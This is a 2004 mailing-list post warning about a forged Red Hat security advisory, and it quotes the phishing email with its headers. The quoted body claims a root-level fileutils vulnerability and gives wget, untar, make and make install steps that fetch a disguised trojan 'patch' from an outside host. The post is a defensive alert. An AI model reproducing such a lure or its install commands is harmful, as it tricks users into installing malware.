[CS-FSLUG] Alert to Trojan Aimed at Red Hat Users
Timothy R. Butler
tbutler at uninetsolutions.com
Sat Nov 20 14:32:55 CST 2004
Dear Sir:
I wanted to alert you to this forged Red Hat security notice that I
received two copies of this morning (see below). I see that it has been
sent out previously to others, but the download location of the file
has changed. I have contacted the company hosting the file, but I would
imagine if Red Hat contacts them they may be more likely to remove it
at an expedited rate.
Best Regards,
Timothy R. Butler
---------------------------------------------------------------
Timothy R. Butler Universal Networks www.uninet.info
==================== <tbutler at uninet.info> ====================
| Christian Portal: | Have you not learned great lessons |
| www.faithtree.com | from those who braced themselves |
| GNU/Linux News: | against you and disputed the |
| www.ofb.biz | passage with you? --Walt Whitman |
---------------------------------------------------------------
Presently on "Albert" (DP PPC 970 "G5" running at 2.0 GHz)
Begin forwarded message:
> From: Red Hat<update at redhat.com>
> Date: November 20, 2004 2:59:43 AM CST
> To: undisclosed-recipients:;
> Subject: Fileutils Buffer Overflow
> Return-Path: <mailman-bounces at cedar.serverforest.com>
> Envelope-To: tbutler at ofb.biz
> Delivery-Date: Sat, 20 Nov 2004 04:07:46 -0500
> Received: from ofb by cedar.serverforest.com with local-bsmtp (Exim
> 4.43) id 1CVRDd-00070v-O9 for tbutler at ofb.biz; Sat, 20 Nov 2004
> 04:07:46 -0500
> Received: from localhost ([127.0.0.1] helo=cedar.serverforest.com) by
> cedar.serverforest.com with esmtp (Exim 4.43) id 1CVRDb-00070a-Eg for
> tbutler at uninetsolutions.com; Sat, 20 Nov 2004 04:07:43 -0500
> Received: from [81.196.160.41] (helo=campus.emsolgroup.com) by
> cedar.serverforest.com with esmtps (TLSv1:AES256-SHA:256) (Exim 4.43)
> id 1CVRDV-000709-Ns for ofbtalk-owner at ofb.biz; Sat, 20 Nov 2004
> 04:07:39 -0500
> Received: from campus.emsolgroup.com (localhost.rdsct.ro [127.0.0.1])
> by campus.emsolgroup.com (8.13.1/8.12.6) with ESMTP id iAK8xhjo008889
> for <ofbtalk-owner at ofb.biz>; Sat, 20 Nov 2004 10:59:43 +0200 (EET)
> (envelope-from nobody at ems.rdsct.ro)
> Received: (from nobody at localhost) by campus.emsolgroup.com
> (8.13.1/8.12.6/Submit) id iAK8xh6M008887 for ofbtalk-owner at ofb.biz;
> Sat, 20 Nov 2004 10:59:43 +0200 (EET)
> Message-Id: <200411200859.iAK8xh6M008887 at campus.emsolgroup.com>
> Mime-Version: 1.0
> Content-Type: text/html; boundary="xlcuiBo847gtaDvjhSdgF983r"
> X-Mailer: ebay
> Errors-To: mailman-bounces at cedar.serverforest.com
> X-Spam-Status: No, score=-0.7 required=5.0 tests=BAYES_00,HTML_30_40,
> HTML_IMAGE_ONLY_20,HTML_MESSAGE,MIME_HTML_ONLY,UNDISC_RECIPS
> autolearn=no version=3.0.1
> X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on
> cedar.serverforest.com
> X-Spam-Level:
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 2826 bytes
Desc: not available
URL: <http://ofb.biz/pipermail/christiansource_ofb.biz/attachments/20041120/38c8e9f9/attachment.bin>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: logo_rh_home.png
Type: image/png
Size: 1266 bytes
Desc: not available
URL: <http://ofb.biz/pipermail/christiansource_ofb.biz/attachments/20041120/38c8e9f9/attachment.png>
-------------- next part --------------
>
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: Red Hat
>
> A complete revision history is at the end of this file.
>
> Dear Red Hat user,
>
> We have found a vulnerability in fileutils (ls and mkdir), that could
> allow a remote attacker to execute arbitrary code with root
> privileges. Some of the affected linux distributions include RedHat
> 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
> and not only. It is known that *BSD and Solaris platforms are NOT
> affected.
>
> The Red Hat Security Team strongly advises you to immediately apply
> the fileutils-1.0.6 patch. This is a critical-critical update that you
> must make by following these steps:
> ? First download the patch from the Wcml Red Hat mirror: wget
> http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz or
> directly here.
> ? Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> ? cd fileutils-1.0.6.patch
> ? make
> ? make install
>
> Again, please apply this patch as soon as possible or you risk your
> system and others` to be compromised.
>
> Thank you for your prompt attention to this serious matter,
>
> Red Hat Security Team.
>
> Copyright ? 2004 Red Hat, Inc. All rights reserved.
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 1233 bytes
Desc: not available
URL: <http://ofb.biz/pipermail/christiansource_ofb.biz/attachments/20041120/38c8e9f9/attachment-0001.bin>
More information about the Christiansource
mailing list